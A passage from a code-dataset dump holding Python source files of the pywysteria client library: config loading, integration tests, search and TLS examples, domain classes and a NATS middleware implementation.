middleware.get(_KEY_MWARE_SSL_ENABLE, \"false\") == 'true',\n )\n\n return Client(\n url=middleware.get(_KEY_MWARE_CONF),\n middleware=middleware.get(_KEY_MWARE_DRIVER, \"nats\"),\n tls=tls,\n )\n\n\ndef default_client() -> Client:\n \"\"\"Build a wysteria client, checking default config locations (in order)\n - wysteria-client.ini\n - WYSTERIA_CLIENT_INI (env var)\n\n And falling back to a default config (no ssl & nats on the localhost).\n\n For security purposes, it is generally recommended you build the client\n youself, using your own certs & requiring signed certs to be presented by\n the server.\n\n Returns:\n wysteria.Client\n \"\"\"\n config_file = _wysteria_config()\n if not config_file:\n return Client() # default with no extra config\n return from_config(config_file)\n" }, { "alpha_fraction": 0.5311191082000732, "alphanum_fraction": 0.5323159694671631, "avg_line_length": 24.127819061279297, "blob_id": "084ca2b7ecba7e20fd0bcbc50c811c0c8b5d9fa8", "content_id": "e572b6b6426c5d664d38b1dfc54f01d7e1cc054c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3342, "license_type": "permissive", "max_line_length": 83, "num_lines": 133, "path": "/tests/integration/tests/domain/resource_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestResource:\n \"\"\"Tests for the Resource class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n cls.item = cls.collection.create_item(_rs(), _rs())\n cls.version = cls.item.create_version()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def _single_resource(self, id_):\n \"\"\"Return a single resource by it's id\n\n Args:\n id_:\n\n Returns:\n Resource\n \"\"\"\n s = self.client.search()\n s.params(id=id_)\n results = s.find_resources(limit=1)\n assert results\n return results[0]\n\n def test_create_resource_raises_on_duplicate(self):\n # arrange\n args = (_rs(), _rs(), _rs())\n self.version.add_resource(*args)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.version.add_resource(*args)\n\n def test_create_resource_doesnt_raise_on_same_resource_different_version(self):\n # arrange\n args = (_rs(), _rs(), _rs())\n other_version = self.item.create_version()\n\n self.version.add_resource(*args)\n\n # act\n other_version.add_resource(*args)\n\n # assert\n assert True\n\n def test_delete_resource(self):\n # arrange\n resource = self.version.add_resource(_rs(), _rs(), _rs())\n\n s = self.client.search()\n s.params(id=resource.id)\n\n # act\n resource.delete()\n results = s.find_resources(limit=1)\n\n # assert\n assert not results\n\n def test_update_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n resource = self.version.add_resource(_rs(), _rs(), _rs())\n\n # act\n resource.update_facets(**facets)\n remote = self._single_resource(resource.id)\n\n # assert\n assert resource\n assert remote\n assert remote == resource\n for k, v in facets.items():\n assert resource.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_resource(self):\n # arrange\n name = _rs()\n type_ = _rs()\n location = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n resource = self.version.add_resource(name, type_, location, facets=facets)\n remote = self._single_resource(resource.id)\n\n # assert\n assert resource\n assert remote\n assert remote == resource\n assert name == remote.name == resource.name\n assert location == remote.location == resource.location\n assert type_ == remote.resource_type == resource.resource_type\n assert resource.id\n assert resource.uri\n assert remote.id\n assert remote.uri\n for k, v in facets.items():\n assert resource.facets[k] == v\n assert remote.facets[k] == v\n" }, { "alpha_fraction": 0.7451984882354736, "alphanum_fraction": 0.7451984882354736, "avg_line_length": 18.04878044128418, "blob_id": "12d5e557d0716b6d64896251d5efaeef6170b869", "content_id": "44bbfe5a00f7e81ec575576a670b755eb7b1e0a0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 781, "license_type": "permissive", "max_line_length": 93, "num_lines": 41, "path": "/wysteria/middleware/__init__.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"Middleware contains the actual communication logic for talking to wysteria.\n\n\nFiles\n-----\n\nabstract_middleware.py\n An abstract class contract that a subclass must implement in order to be used as a viable\n middleware.\n\nimpl_nats.py\n A Nats.io implementation of the abstract middleware class.\n\nimpl_grpc.py\n A gRPC implementation of the the middleware class\n\nwgrpc/\n Auto generated files for gRPC by protobuf.\n\n\nExported\n--------\n\n NatsMiddleware\n A Nats.io implementation of the abstract middleware class\n\n GRPCMiddleware\n A gRPC implementation of the the middleware class\n\n\n\n\"\"\"\n\nfrom wysteria.middleware.impl_nats import NatsMiddleware\nfrom wysteria.middleware.impl_grpc import GRPCMiddleware\n\n\n__all__ = [\n \"NatsMiddleware\",\n \"GRPCMiddleware\",\n]\n" }, { "alpha_fraction": 0.6107977628707886, "alphanum_fraction": 0.6156325340270996, "avg_line_length": 30.024999618530273, "blob_id": "b6742ace5157b2454c6e91529135a84f4a06bb9f", "content_id": "f6ddc9281134ff10f9d7486bc9be4ad8bf0909a3", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1241, "license_type": "permissive", "max_line_length": 80, "num_lines": 40, "path": "/examples/04/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample04: Searching via builtin facets & using links\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n\n # Wysteria will have added some facets auto-magically for us,\n # and it pays when searching for Versions to be as specific as possible\n search.params(facets={\n wysteria.FACET_COLLECTION: \"maps\",\n wysteria.FACET_ITEM_TYPE: \"2dmap\",\n wysteria.FACET_ITEM_VARIANT: \"forest\",\n })\n\n # grab the version we made earlier\n forest_version = search.find_versions()[0]\n\n # pull out all linked versions, regardless of their names\n result = forest_version.get_linked()\n\n # if you recall, we made two links from forest01 both named \"input\"\n print(\"All linked versions (link name: version)\")\n for link_name, versions in result.items():\n for version in versions:\n print(link_name, version)\n\n # On the other hand, we could just request linked versions named \"input\"\n print(\"linked 'input' versions\")\n for version in forest_version.get_linked_by_name(\"input\"):\n print(version)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5197121500968933, "alphanum_fraction": 0.5197121500968933, "avg_line_length": 20.890411376953125, "blob_id": "eb65d98cc018d7d84a57d1017b6a8b0ec597e78f", "content_id": "f942607362747a66e653c10cc1131423dac6fea0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3196, "license_type": "permissive", "max_line_length": 95, "num_lines": 146, "path": "/wysteria/domain/base.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import abc\nimport copy\n\n\nclass WysBaseObj(metaclass=abc.ABCMeta):\n \"\"\"\n Represents a wysteria obj in the most general sense\n \"\"\"\n\n def __init__(self, **kwargs):\n self._id = kwargs.get(\"id\", \"\")\n self._uri = kwargs.get(\"uri\", \"\")\n self._facets = kwargs.get(\"facets\", {})\n\n def encode(self) -> dict:\n \"\"\"Encode this obj into a dict\n\n Returns:\n dict\n \"\"\"\n return copy.copy(self._encode())\n\n @abc.abstractmethod\n def _encode(self) -> dict:\n \"\"\"Return a dict version of the object\n\n Returns:\n dict\n \"\"\"\n pass\n\n @property\n def id(self) -> str:\n \"\"\"Return the ID of this object\n\n Returns:\n str\n \"\"\"\n return self._id\n\n @abc.abstractmethod\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n # Nb. This property is the only one we don't know on creation as it's determined on the\n # server and isn't auto returned.\n pass\n\n @property\n def uri(self) -> str:\n \"\"\"Return the unique URI for this object.\n\n Returns:\n str\n\n Raises:\n ValueError if the URI cannot be found / constructed\n \"\"\"\n if not self._uri:\n self._uri = self._fetch_uri()\n\n if not self._uri:\n raise ValueError(\"Unable to fetch URI\")\n\n return self._uri\n\n @property\n def facets(self) -> dict:\n \"\"\"Return a copy of this object's facets\n\n Returns:\n dict\n \"\"\"\n return copy.copy(self._facets)\n\n def update_facets(self, **kwargs):\n \"\"\"Update this object's facets with the give key / values pairs.\n\n Args:\n **kwargs:\n\n Raises:\n RequestTimeoutError\n \"\"\"\n if not kwargs:\n return\n\n self._update_facets(kwargs)\n self._facets.update(kwargs)\n\n @abc.abstractmethod\n def _update_facets(self, facets):\n \"\"\"Perform the actual wysteria call to update facets.\n\n Args:\n facets (dict):\n\n \"\"\"\n pass\n\n def __str__(self):\n return str(self.encode())\n\n def __repr__(self):\n return \"<%s %s>\" % (self.__class__.__name__, self.id)\n\n\nclass ChildWysObj(WysBaseObj):\n \"\"\"\n Represents a wysteria obj that has a parent obj\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.__cached_parent_obj = None\n self._parent = kwargs.get(\"parent\", \"\")\n\n @property\n def parent(self):\n \"\"\"Return the ID of this object's parent\n\n Returns:\n str\n \"\"\"\n return self._parent\n\n @abc.abstractmethod\n def _get_parent(self):\n \"\"\"Return the parent obj of this object.\n\n Returns:\n sub class of WysBaseObj\n \"\"\"\n pass\n\n def get_parent(self):\n \"\"\"Return the parent collection of this item\n\n Returns:\n sub class of WysBaseObj or None\n \"\"\"\n if not self.__cached_parent_obj:\n self.__cached_parent_obj = self._get_parent()\n return self.__cached_parent_obj\n" }, { "alpha_fraction": 0.5264253616333008, "alphanum_fraction": 0.5280268788337708, "avg_line_length": 25.913793563842773, "blob_id": "42fff7eb6c0ff72e1fe378185c1c0f33c4f47589", "content_id": "d7d9173d3a98706cc1882f11315c33b2310ba411", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6244, "license_type": "permissive", "max_line_length": 96, "num_lines": 232, "path": "/wysteria/domain/item.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nimport wysteria.constants as consts\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.query_desc import QueryDesc\nfrom wysteria.domain.version import Version\nfrom wysteria.domain.link import Link\n\n\nclass Item(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._itemtype = kwargs.get(\"itemtype\", \"\")\n self._variant = kwargs.get(\"variant\", \"\")\n\n def __eq__(self, other):\n if not isinstance(other, Item):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.parent == other.parent,\n self.item_type == other.item_type,\n self.variant == other.variant,\n self.parent == other.parent,\n ])\n\n def _encode(self) -> dict:\n \"\"\"Return a dict representation of this Item\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n \"parent\": self._parent,\n \"facets\": self.facets,\n \"itemtype\": self._itemtype,\n \"variant\": self._variant,\n }\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_items([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n @property\n def item_type(self) -> str:\n \"\"\"Return the item type for this Item\n\n Returns:\n str\n \"\"\"\n return self._itemtype\n\n @property\n def variant(self) -> str:\n \"\"\"Return the item variant of this Item\n\n Returns:\n str\n \"\"\"\n return self._variant\n\n def delete(self):\n \"\"\"Delete this item.\"\"\"\n return self.__conn.delete_item(self.id)\n\n def get_linked_by_name(self, name: str):\n \"\"\"Get linked Items by the link name\n\n Args:\n name (str):\n\n Returns:\n []domain.Item\n \"\"\"\n if not name:\n return []\n\n # step 1: grab all links whose source is our id of the correct name\n link_query = [QueryDesc().link_source(self.id).name(name)]\n links = self.__conn.find_links(link_query)\n\n # step 2: grab all items whose id is the destination of one of our links\n item_query = [QueryDesc().id(l.destination) for l in links]\n return self.__conn.find_items(item_query)\n\n def get_linked(self) -> dict:\n \"\"\"Get all linked items and return a dict of link name (str) to []item\n\n Returns:\n dict\n \"\"\"\n # step 1: grab all links whose source is our id\n link_query = [QueryDesc().link_source(self.id)]\n links = self.__conn.find_links(link_query)\n\n # step 2: build item query, and record item id -> link name map\n item_id_to_link_name = {}\n item_query = []\n for link in links:\n desired_item_id = link.destination\n item_id_to_link_name[desired_item_id] = link.name\n item_query.append(\n QueryDesc().id(link.destination)\n )\n\n # step 3: return matching item list\n items = self.__conn.find_items(item_query)\n\n # step 4: build into link name -> []item map\n result = {}\n for item in items:\n link_name = item_id_to_link_name.get(item.id)\n if not link_name:\n continue\n\n # ToDO: Rework into collections.defaultdict\n tmp = result.get(link_name, [])\n tmp.append(item)\n result[link_name] = tmp\n return result\n\n def link_to(self, name: str, item, facets: dict=None) -> Link:\n \"\"\"Create link between two items\n\n Args:\n name (str):\n item (domain.Item):\n facets (dict):\n\n Returns:\n Link\n\n Raises:\n ValueError if given item not of type Item\n \"\"\"\n if not isinstance(item, self.__class__):\n raise ValueError(f\"Expected item to be of type Item, got {item.__class__.__name__}\")\n\n cfacets = self._default_child_facets\n cfacets[consts.FACET_LINK_TYPE] = consts.VALUE_LINK_TYPE_ITEM\n if facets:\n cfacets.update(facets)\n\n lnk = Link(\n self.__conn,\n src=self.id,\n dst=item.id,\n name=name,\n facets=cfacets\n )\n lnk._id = self.__conn.create_link(lnk)\n return lnk\n\n def _update_facets(self, facets: dict):\n \"\"\"Set given key / value pairs in item facets\n\n Args:\n facets: facets to update\n \"\"\"\n self.__conn.update_item_facets(self.id, facets)\n\n @property\n def _default_child_facets(self) -> dict:\n \"\"\"Return default facets to set on child objects\n\n Returns:\n dict\n \"\"\"\n return {\n consts.FACET_COLLECTION: self.facets.get(consts.FACET_COLLECTION),\n consts.FACET_ITEM_TYPE: self.item_type,\n consts.FACET_ITEM_VARIANT: self.variant,\n }\n\n def create_version(self, facets: dict=None) -> Version:\n \"\"\"Create the next version obj for this item\n\n Args:\n facets (dict):\n\n Returns:\n domain.Version\n \"\"\"\n cfacets = self._default_child_facets\n if facets:\n cfacets.update(facets)\n\n v = Version(\n self.__conn,\n parent=self.id,\n facets=cfacets\n )\n\n vid, vnum = self.__conn.create_version(v)\n v._id = vid\n v._number = vnum\n return v\n\n def get_published(self) -> Version:\n \"\"\"Gvet the current published version of this Item, if any\n\n Returns:\n domain.Version or None\n \"\"\"\n return self.__conn.get_published_version(self.id)\n\n def _get_parent(self):\n \"\"\"Return the parent item of this version\n\n Returns:\n domain.Collection or None\n \"\"\"\n results = self.__conn.find_collections(\n [QueryDesc().id(self._parent)],\n limit=1,\n )\n if results:\n return results[0]\n return None\n" }, { "alpha_fraction": 0.5738095045089722, "alphanum_fraction": 0.5753968358039856, "avg_line_length": 25.808509826660156, "blob_id": "db9d59cda508ffee8e9214e9c3e8d98d225f9124", "content_id": "54d00d3996dc8be7db82645e10e2abfba32e1e04", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1260, "license_type": "permissive", "max_line_length": 72, "num_lines": 47, "path": "/examples/03/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample03: Searching for things\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n # create new search object\n search = client.search()\n\n # set\n search.params(item_type=\"tree\", item_variant=\"oak\")\n\n # find any & all matching items\n print(\"Items of type 'tree' and variant 'oak'\")\n items = search.find_items()\n for item in items:\n print(item)\n\n # You can add more query params to find more matches at a time.\n # Better than doing lots of single queries if you can manage it.\n # create new search object\n search = client.search()\n\n # build up a search query\n # This is understood as\n # (type \"tree\" AND variant oak) OR (type tree AND variant pine)\n print(\"items of type tree and variant oak or pine\")\n search.params(item_type=\"tree\", item_variant=\"oak\")\n search.params(item_type=\"tree\", item_variant=\"pine\")\n\n # grab matching items\n items = search.find_items()\n for item in items:\n print(item)\n\n # All items!\n print(\"Any item\")\n for item in client.search().find_items():\n print(item)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6446776390075684, "alphanum_fraction": 0.6506746411323547, "avg_line_length": 20.516128540039062, "blob_id": "701acd199ac780091501d2d3bc5da070968d520c", "content_id": "a94f4a9ccda189d67b9d61f543966805abcae868", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 667, "license_type": "permissive", "max_line_length": 76, "num_lines": 31, "path": "/examples/09/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample09: TLS\n\"\"\"\nimport ssl\n\nimport wysteria\n\n\n_key = \"test.key\"\n_cert = \"test.crt\"\n\n\ndef ssl_context(key: str, cert: str, verify: bool=False):\n \"\"\"Simple func to create a ssl_context from the given key/cert files\n \"\"\"\n purpose = ssl.Purpose.SERVER_AUTH if verify else ssl.Purpose.CLIENT_AUTH\n tls = ssl.create_default_context(purpose=purpose)\n tls.protocol = ssl.PROTOCOL_TLSv1_2\n tls.load_cert_chain(certfile=cert, keyfile=key)\n return tls\n\n\ndef main():\n client = wysteria.Client(tls=ssl_context(_key, _cert))\n with client:\n tiles = client.get_collection(\"tiles\")\n print(tiles)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5549784898757935, "alphanum_fraction": 0.556063711643219, "avg_line_length": 28.862268447875977, "blob_id": "f746157adffc5cd8925a11faaf56299f232c1cc5", "content_id": "c16fe404c920eeb0acc68d7bcd72ea291bf46b1c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25801, "license_type": "permissive", "max_line_length": 98, "num_lines": 864, "path": "/wysteria/middleware/impl_nats.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import json\nimport threading\nimport ssl\nimport queue\n\nimport asyncio\nfrom nats.aio.client import Client as NatsClient\nfrom nats.aio import errors as nats_errors\n\nfrom wysteria.middleware.abstract_middleware import WysteriaConnectionBase\nfrom wysteria import constants as consts\nfrom wysteria import domain\nfrom wysteria import errors\n\n\n_DEFAULT_URI = \"nats://localhost:4222\" # default localhost, nats port\n_CLIENT_ROUTE = \"w.client.%s\" # From a client\n\n# wysteria nats protocol routes\n_KEY_CREATE_COLLECTION = _CLIENT_ROUTE % \"cc\"\n_KEY_CREATE_ITEM = _CLIENT_ROUTE % \"ci\"\n_KEY_CREATE_VERSION = _CLIENT_ROUTE % \"cv\"\n_KEY_CREATE_RESOURCE = _CLIENT_ROUTE % \"cr\"\n_KEY_CREATE_LINK = _CLIENT_ROUTE % \"cl\"\n\n_KEY_DELETE_COLLECTION = _CLIENT_ROUTE % \"dc\"\n_KEY_DELETE_ITEM = _CLIENT_ROUTE % \"di\"\n_KEY_DELETE_VERSION = _CLIENT_ROUTE % \"dv\"\n_KEY_DELETE_RESOURCE = _CLIENT_ROUTE % \"dr\"\n\n_KEY_FIND_COLLECTION = _CLIENT_ROUTE % \"fc\"\n_KEY_FIND_ITEM = _CLIENT_ROUTE % \"fi\"\n_KEY_FIND_VERSION = _CLIENT_ROUTE % \"fv\"\n_KEY_FIND_RESOURCE = _CLIENT_ROUTE % \"fr\"\n_KEY_FIND_LINK = _CLIENT_ROUTE % \"fl\"\n\n_KEY_GET_PUBLISHED = _CLIENT_ROUTE % \"gp\"\n_KEY_SET_PUBLISHED = _CLIENT_ROUTE % \"sp\"\n\n_KEY_UPDATE_COLLECTION = _CLIENT_ROUTE % \"uc\"\n_KEY_UPDATE_ITEM = _CLIENT_ROUTE % \"ui\"\n_KEY_UPDATE_VERSION = _CLIENT_ROUTE % \"uv\"\n_KEY_UPDATE_RESOURCE = _CLIENT_ROUTE % \"ur\"\n_KEY_UPDATE_LINK = _CLIENT_ROUTE % \"ul\"\n\n\nNATS_MSG_RETRIES = 3\n_NATS_MIN_TIMEOUT = 2 # seconds, chosen by experimentation\n\n\ndef _load_ssl_context(key, cert, verify=False):\n \"\"\"Util func to load an ssl context.\n\n Args:\n key (str): path to file\n cert (str): path to file\n verify (bool): if true, we'll verify the server's certs\n\n Returns:\n ssl_context\n \"\"\"\n purpose = ssl.Purpose.SERVER_AUTH if verify else ssl.Purpose.CLIENT_AUTH\n tls = ssl.create_default_context(purpose=purpose)\n tls.protocol = ssl.PROTOCOL_TLSv1_2\n tls.load_cert_chain(certfile=cert, keyfile=key)\n return tls\n\n\ndef _retry(func):\n \"\"\"Simple wrapper func that retries the given func some number of times\n on any exception(s).\n\n Warning: Care should be taken to use this on idempotent functions only\n\n Args:\n func:\n\n Returns:\n ?\n \"\"\"\n def retry_func(*args, **kwargs):\n for count in range(0, NATS_MSG_RETRIES + 1):\n try:\n return func(*args, **kwargs)\n except (errors.RequestTimeoutError, queue.Empty):\n if count >= NATS_MSG_RETRIES:\n raise\n return retry_func\n\n\nclass _AsyncIONats(threading.Thread):\n \"\"\"Tiny class to handle queuing requests through asyncio.\n\n Essentially, a wrapper class around the Nats.IO asyncio implementation to provide us with\n the functionality we're after. This makes for a much nicer interface to work with than\n the incredibly annoying & ugly examples https://github.com/nats-io/asyncio-nats .. ewww.\n \"\"\"\n\n _MAX_RECONNECTS = 10\n\n def __init__(self, url, tls):\n threading.Thread.__init__(self)\n self._conn = None\n self._outgoing = queue.Queue() # outbound messages added in request()\n self._running = False\n\n self.opts = { # opts to pass to Nats.io client\n \"servers\": [url],\n \"allow_reconnect\": True,\n \"max_reconnect_attempts\": self._MAX_RECONNECTS,\n }\n\n if tls:\n self.opts[\"tls\"] = tls\n\n @asyncio.coroutine\n def main(self, loop):\n \"\"\"Connect to remote host(s)\n\n Raises:\n NoServersError\n \"\"\"\n # explicitly set the asyncio event loop so it can't get confused ..\n asyncio.set_event_loop(loop)\n\n self._conn = NatsClient()\n\n try:\n yield from self._conn.connect(io_loop=loop, **self.opts)\n except nats_errors.ErrNoServers as e:\n # Could not connect to any server in the cluster.\n raise errors.NoServersError(e)\n\n while self._running:\n if self._outgoing.empty():\n # No one wants to send a message\n continue\n\n if not self._conn.is_connected:\n # give nats more time to (re)connect\n continue\n\n reply_queue, key, data = self._outgoing.get_nowait() # pull request from queue\n if reply_queue is None:\n # we're passed None only when we're supposed to exit. See stop()\n break\n\n try:\n result = yield from self._conn.request(key, bytes(data, encoding=\"utf8\"))\n reply_queue.put_nowait(result.data.decode())\n except nats_errors.ErrConnectionClosed as e:\n reply_queue.put_nowait(errors.ConnectionClosedError(e))\n except (nats_errors.ErrTimeout, queue.Empty) as e:\n reply_queue.put_nowait(errors.RequestTimeoutError(e))\n except Exception as e: # pass all errors up to the caller\n reply_queue.put_nowait(e)\n\n yield from self._conn.close()\n\n def request(self, data: dict, key: str, timeout: int=5) -> dict:\n \"\"\"Send a request to the server & await the reply.\n\n Args:\n data: data to send\n key: the key (subject) to send the message to\n timeout: some time in seconds to wait before calling it quits\n\n Returns:\n dict\n\n Raises:\n RequestTimeoutError\n ConnectionClosedError\n NoServersError\n \"\"\"\n q = queue.Queue(maxsize=NATS_MSG_RETRIES) # create a queue to get a reply on\n self._outgoing.put_nowait((q, key, data)) # add our message to the outbound queue\n try:\n result = q.get(timeout=max([_NATS_MIN_TIMEOUT, timeout])) # block for a reply\n except queue.Empty as e: # we waited, but nothing was returned to us :(\n raise errors.RequestTimeoutError(\"Timeout waiting for server reply. Original %s\" % e)\n\n if isinstance(result, Exception):\n raise result\n return result\n\n def stop(self):\n \"\"\"Stop the service, killing open connection(s)\n \"\"\"\n # set to false to kill coroutine running in main()\n self._running = False\n\n # interpreted as a poison pill (causes main() loop to break)\n self._outgoing.put((None, None, None))\n\n if not self._conn:\n return\n\n try:\n # flush & kill the actual connections\n self._conn.flush()\n self._conn.close()\n except Exception:\n pass\n\n def run(self):\n \"\"\"Start the service\n \"\"\"\n if self._running:\n return\n\n self._running = True\n\n loop = asyncio.new_event_loop()\n loop.run_until_complete(self.main(loop))\n try:\n loop.close()\n except Exception:\n pass\n\n\nclass NatsMiddleware(WysteriaConnectionBase):\n \"\"\"Wysteria middleware client using Nats.io to manage transport\n\n Using python nats client (copied & modified in libs/ dir)\n https://github.com/jackytu/python-nats/blob/master/nats/client.py\n\n \"\"\"\n def __init__(self, url: str=None, tls=None):\n \"\"\"Construct new client\n\n Url as in \"nats://user:password@host:port\"\n\n Args:\n url (str)\n tls (ssl_context)\n \"\"\"\n if not url:\n url = _DEFAULT_URI\n\n ssl_context = None\n if tls:\n if tls.enable:\n ssl_context = _load_ssl_context(tls.key, tls.cert, verify=tls.verify)\n\n self._conn = _AsyncIONats(url, ssl_context)\n\n def connect(self):\n \"\"\"Connect to remote host(s)\n\n Raises:\n Exception if unable to establish connection to remote host(s)\n \"\"\"\n self._conn.setDaemon(True)\n self._conn.start()\n\n def close(self):\n \"\"\"Close remote connection\"\"\"\n self._conn.stop()\n\n @_retry\n def _sync_idempotent_msg(self, data: dict, key: str, timeout: int=3):\n \"\"\"Send an idempotent message to the server and wait for a reply.\n\n This will be retried on failure(s) up to NATS_MSG_RETRIES times.\n\n Args:\n data (dict): json data to send\n key (str): message subject\n timeout (int): seconds to wait for reply\n\n Returns:\n dict\n\n Raises:\n errors.RequestTimeoutError\n \"\"\"\n return self._single_request(data, key, timeout=timeout)\n\n def _single_request(self, data: dict, key: str, timeout: int=5) -> int:\n \"\"\"\n\n Args:\n data: dict\n key: str (subject key)\n timeout: time in seconds to wait before erroring\n\n Returns:\n dict\n \"\"\"\n if not isinstance(data, str):\n data = json.dumps(data)\n\n reply = self._conn.request(data, key, timeout=timeout)\n return json.loads(reply)\n\n def _generic_find(self, query: list, key: str, limit: int, offset: int):\n \"\"\"Send a find query to the server, return results (if any)\n\n Args:\n query ([domain.QueryDesc]):\n key (str):\n limit (int):\n offset (int):\n\n Returns:\n []dict\n\n Raises:\n Exception on server err\n \"\"\"\n data = {\n \"query\": [q.encode() for q in query if q.is_valid],\n \"limit\": limit,\n \"offset\": offset,\n }\n\n reply = self._sync_idempotent_msg(data, key)\n\n err_msg = reply.get(\"Error\")\n if err_msg: # wysteria replied with an err, we should raise it\n raise Exception(err_msg)\n\n # the server replies with UpperCase strings, but we want to python-ise to lowercase\n return [{k.lower(): v for k, v in result.items()} for result in reply.get(\"All\", [])]\n\n def find_collections(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Collection\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Collection(self, **c) for c in self._generic_find(\n query, _KEY_FIND_COLLECTION, limit, offset\n )\n ]\n\n def find_items(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Item\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Item(self, **c) for c in self._generic_find(\n query, _KEY_FIND_ITEM, limit, offset\n )\n ]\n\n def find_versions(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Version\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Version(self, **c) for c in self._generic_find(\n query, _KEY_FIND_VERSION, limit, offset\n )\n ]\n\n def find_resources(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Resource\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Resource(self, **c) for c in self._generic_find(\n query, _KEY_FIND_RESOURCE, limit, offset\n )\n ]\n\n def find_links(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Link\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Link(self, **c) for c in self._generic_find(\n query, _KEY_FIND_LINK, limit, offset\n )\n ]\n\n def get_published_version(self, oid: str):\n \"\"\"Item ID to find published version for\n\n Args:\n oid (str): item id to find published version for\n\n Returns:\n wysteria.domain.Version or None\n\n Raises:\n Exception on network / server error\n \"\"\"\n reply = self._sync_idempotent_msg(\n {\"id\": oid}, _KEY_GET_PUBLISHED\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n raise Exception(err_msg)\n\n data = reply.get(\"Version\", None)\n if not data:\n return None\n\n # the server replies with UpperCase keys, we want to pythonize to lowercase\n return domain.Version(self, **{k.lower(): v for k, v in data.items()})\n\n def publish_version(self, oid: str):\n \"\"\"Version ID mark as published\n\n Args:\n oid (str): version id to publish\n\n Raises:\n Exception on network / server error\n \"\"\"\n reply = self._sync_idempotent_msg(\n {\"id\": oid}, _KEY_SET_PUBLISHED\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n raise Exception(err_msg)\n\n def _sync_update_facets_msg(self, oid: str, facets: dict, key: str, find_func):\n \"\"\"Specific call to update the facets on an object matching the given 